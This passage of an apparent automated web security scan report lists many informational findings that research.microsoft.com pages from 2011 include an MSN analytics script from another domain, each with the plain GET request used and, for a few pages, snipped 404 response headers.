18.98. http://research.microsoft.com/en-us/labs/fuse/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/labs/fuse/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/labs/fuse/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.99. http://research.microsoft.com/en-us/labs/ilabs/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/labs/ilabs/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/labs/ilabs/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.100. http://research.microsoft.com/en-us/labs/india/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/labs/india/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/labs/india/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.101. http://research.microsoft.com/en-us/labs/newengland/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/labs/newengland/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/labs/newengland/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.102. http://research.microsoft.com/en-us/labs/newengland/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/labs/newengland/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/labs/newengland/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.103. http://research.microsoft.com/en-us/labs/redmond/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/labs/redmond/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/labs/redmond/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.104. http://research.microsoft.com/en-us/labs/siliconvalley/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/labs/siliconvalley/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/labs/siliconvalley/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.105. http://research.microsoft.com/en-us/labs/xcg/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/labs/xcg/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/labs/xcg/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.106. http://research.microsoft.com/en-us/news/features/2010interns-081610.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/news/features/2010interns-081610.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/news/features/2010interns-081610.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.107. http://research.microsoft.com/en-us/news/features/hoare-080411.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/news/features/hoare-080411.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/news/features/hoare-080411.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.108. http://research.microsoft.com/en-us/news/features/interns-080309.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/news/features/interns-080309.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/news/features/interns-080309.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.109. http://research.microsoft.com/en-us/news/features/interns2011-082511.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/news/features/interns2011-082511.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/news/features/interns2011-082511.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.110. http://research.microsoft.com/en-us/news/features/phillipstr35-082311.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/news/features/phillipstr35-082311.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/news/features/phillipstr35-082311.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.111. http://research.microsoft.com/en-us/news/features/siggraph2011awards.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/news/features/siggraph2011awards.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/news/features/siggraph2011awards.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.112. http://research.microsoft.com/en-us/news/features/speechrecognition-082911.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/news/features/speechrecognition-082911.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/news/features/speechrecognition-082911.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.113. http://research.microsoft.com/en-us/news/headlines/2011womenscholarships-012811.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/news/headlines/2011womenscholarships-012811.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/news/headlines/2011womenscholarships-012811.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.114. http://research.microsoft.com/en-us/news/headlines/ibukaaward-081511.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/news/headlines/ibukaaward-081511.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/news/headlines/ibukaaward-081511.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.115. http://research.microsoft.com/en-us/people/abadi/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/abadi/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/abadi/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.116. http://research.microsoft.com/en-us/people/adiamant/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/adiamant/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/adiamant/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.117. http://research.microsoft.com/en-us/people/ajbrush/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/ajbrush/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/ajbrush/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.118. http://research.microsoft.com/en-us/people/akashl/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/akashl/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/akashl/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.119. http://research.microsoft.com/en-us/people/alecw/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/alecw/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/alecw/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.120. http://research.microsoft.com/en-us/people/alexac/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/alexac/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/alexac/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.121. http://research.microsoft.com/en-us/people/aphillip/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/aphillip/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/aphillip/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.122. http://research.microsoft.com/en-us/people/aproutie/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/aproutie/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/aproutie/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:27:12 GMT
Connection: close
Content-Length: 59299

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head id="ctl00_ctl00_HeadTag"><meta http-equiv="X-UA-Compatible"
...[SNIP]...
</script>
<script type="text/javascript" src="http://stj.msn.com/br/om/js/s_code.js"></script>
...[SNIP]...

18.123. http://research.microsoft.com/en-us/people/aratan/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/aratan/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/aratan/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.124. http://research.microsoft.com/en-us/people/asellen/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/asellen/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/asellen/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.125. http://research.microsoft.com/en-us/people/asellen/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/asellen/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/asellen/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.126. http://research.microsoft.com/en-us/people/bainguo/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/bainguo/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/bainguo/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.127. http://research.microsoft.com/en-us/people/bibuxton/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/bibuxton/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/bibuxton/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.128. http://research.microsoft.com/en-us/people/birrell/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/birrell/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/birrell/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.129. http://research.microsoft.com/en-us/people/blinn/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/blinn/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/blinn/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:27:44 GMT
Connection: close
Content-Length: 59299

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head id="ctl00_ctl00_HeadTag"><meta http-equiv="X-UA-Compatible"
...[SNIP]...
</script>
<script type="text/javascript" src="http://stj.msn.com/br/om/js/s_code.js"></script>
...[SNIP]...

18.130. http://research.microsoft.com/en-us/people/bycook/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/bycook/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/bycook/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.131. http://research.microsoft.com/en-us/people/cthacker/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/cthacker/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/cthacker/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.132. http://research.microsoft.com/en-us/people/dburger/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/dburger/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/dburger/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.133. http://research.microsoft.com/en-us/people/dburger/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/dburger/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/dburger/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.134. http://research.microsoft.com/en-us/people/deng/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/deng/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/deng/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.135. http://research.microsoft.com/en-us/people/dmb/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/dmb/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/dmb/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.136. http://research.microsoft.com/en-us/people/dmb/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/dmb/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/dmb/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.137. http://research.microsoft.com/en-us/people/dwork/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/dwork/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/dwork/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.138. http://research.microsoft.com/en-us/people/gbell/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/gbell/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/gbell/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.139. http://research.microsoft.com/en-us/people/ggr/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/ggr/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/ggr/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 13:27:33 GMT
Connection: close
Content-Length: 59299

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head id="ctl00_ctl00_HeadTag"><meta http-equiv="X-UA-Compatible"
...[SNIP]...
</script>
<script type="text/javascript" src="http://stj.msn.com/br/om/js/s_code.js"></script>
...[SNIP]...

18.140. http://research.microsoft.com/en-us/people/goldberg/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/goldberg/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/goldberg/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.141. http://research.microsoft.com/en-us/people/grama/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/grama/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/grama/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.142. http://research.microsoft.com/en-us/people/gray/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/gray/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/gray/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.143. http://research.microsoft.com/en-us/people/gray/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/gray/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/gray/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.144. http://research.microsoft.com/en-us/people/hon/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/hon/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/hon/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.145. http://research.microsoft.com/en-us/people/horvitz/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/horvitz/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/horvitz/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.146. http://research.microsoft.com/en-us/people/hsalama/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/hsalama/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/hsalama/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.147. http://research.microsoft.com/en-us/people/hshum/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/hshum/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/hshum/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.148. http://research.microsoft.com/en-us/people/indranim/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/indranim/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/indranim/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.149. http://research.microsoft.com/en-us/people/jamiesho/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/jamiesho/

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/jamiesho/ HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.150. http://research.microsoft.com/en-us/people/jbishop/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/jbishop/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/jbishop/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.151. http://research.microsoft.com/en-us/people/jiansun/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/jiansun/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/jiansun/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.152. http://research.microsoft.com/en-us/people/johndo/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/johndo/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/johndo/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.153. http://research.microsoft.com/en-us/people/jplatt/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/jplatt/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/jplatt/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.154. http://research.microsoft.com/en-us/people/jtw/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
Path:	/en-us/people/jtw/default.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://stj.msn.com/br/om/js/s_code.js

Request

GET /en-us/people/jtw/default.aspx HTTP/1.1
Host: research.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

18.155. http://research.microsoft.com/en-us/people/krw/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://research.microsoft.com
